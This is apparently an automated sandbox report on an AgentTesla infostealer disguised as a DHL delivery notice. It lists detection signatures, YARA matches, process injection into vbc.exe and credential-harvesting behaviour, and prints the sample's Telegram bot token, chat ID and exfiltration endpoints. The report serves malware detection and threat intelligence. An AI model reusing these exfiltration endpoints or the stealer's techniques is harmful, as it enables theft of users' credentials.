Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dhl recent package delivery report needs attention.exe

Overview

General Information

Sample Name:Dhl recent package delivery report needs attention.exe
Analysis ID:626595
MD5:163d3bc2c523dc10c959474aa3f69d56
SHA1:5338e0aaea69b582d22ff624b4a9fd4efc9eb707
SHA256:1040411f26f6464fb485e92e74c08c559a6feb9bed0eadc44e831a08c80e8a01
Tags:AgentTeslaDHLexeTelegram
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Dhl recent package delivery report needs attention.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe" MD5: 163D3BC2C523DC10C959474AA3F69D56)
    • vbc.exe (PID: 2728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "1436982177", "Chat URL": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument"}
SourceRuleDescriptionAuthorStrings
00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 14 entries
            SourceRuleDescriptionAuthorStrings
            2.0.vbc.exe.610000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              2.0.vbc.exe.610000.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                2.0.vbc.exe.610000.3.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  2.0.vbc.exe.610000.3.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                  • 0x32c56:$s10: logins
                  • 0x326bd:$s11: credential
                  • 0x2ec03:$g1: get_Clipboard
                  • 0x2ec11:$g2: get_Keyboard
                  • 0x2ec1e:$g3: get_Password
                  • 0x2ff1b:$g4: get_CtrlKeyDown
                  • 0x2ff2b:$g5: get_ShiftKeyDown
                  • 0x2ff3c:$g6: get_AltKeyDown
                  2.2.vbc.exe.610000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 33 entries
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1436982177", "Chat URL": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument"}
                    Source: vbc.exe.2728.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendMessage"}
                    Source: Dhl recent package delivery report needs attention.exeReversingLabs: Detection: 36%
                    Source: Dhl recent package delivery report needs attention.exeJoe Sandbox ML: detected
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49770 version: TLS 1.2
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bf231981d6Host: api.telegram.orgContent-Length: 1007Expect: 100-continueConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: vbc.exe, 00000002.00000002.639895069.0000000006CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: vbc.exe, 00000002.00000002.640666655.0000000009DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hEsAGj.com
                    Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/L
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2v
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
                    Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/
                    Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocumentdocument-----
                    Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4Hkp
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dafa.fa
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyuDgc6hArJiFp.org
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bf231981d6Host: api.telegram.orgContent-Length: 1007Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49770 version: TLS 1.2
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388094558.000000000085B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.0.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 2.0.vbc.exe.610000.4.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 2.0.vbc.exe.610000.3.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 2.0.vbc.exe.610000.1.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 2.2.vbc.exe.610000.0.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_008DF080
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_008DF3C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_008D02C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_008DF3BD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A104BC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A1030E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A101150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A104F40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A108780
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeCode function: 1_2_049EEF28 CreateProcessAsUserA,
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.387791663.0000000000250000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameAcroCEF.exe> vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.387791663.0000000000250000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameAcroCEF.exe< vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameoOGLJXHkjIUdDHWuyQTkUEYbpke.exe4 vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameoOGLJXHkjIUdDHWuyQTkUEYbpke.exe4 vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exeBinary or memory string: OriginalFilenameAcroCEF.exe> vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exeBinary or memory string: OriginalFilenameAcroCEF.exe< vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Dhl recent package delivery report needs attention.exeReversingLabs: Detection: 36%
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe "C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe"
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dhl recent package delivery report needs attention.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.csCryptographic APIs: 'CreateDecryptor'
                    Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.csCryptographic APIs: 'CreateDecryptor'
                    Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.0.vbc.exe.610000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 2.0.vbc.exe.610000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 2.0.vbc.exe.610000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 2.0.vbc.exe.610000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeCode function: 1_2_049E2857 push ebx; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.52092762283
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeFile created: \dhl recent package delivery report needs attention.exe
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeFile created: \dhl recent package delivery report needs attention.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
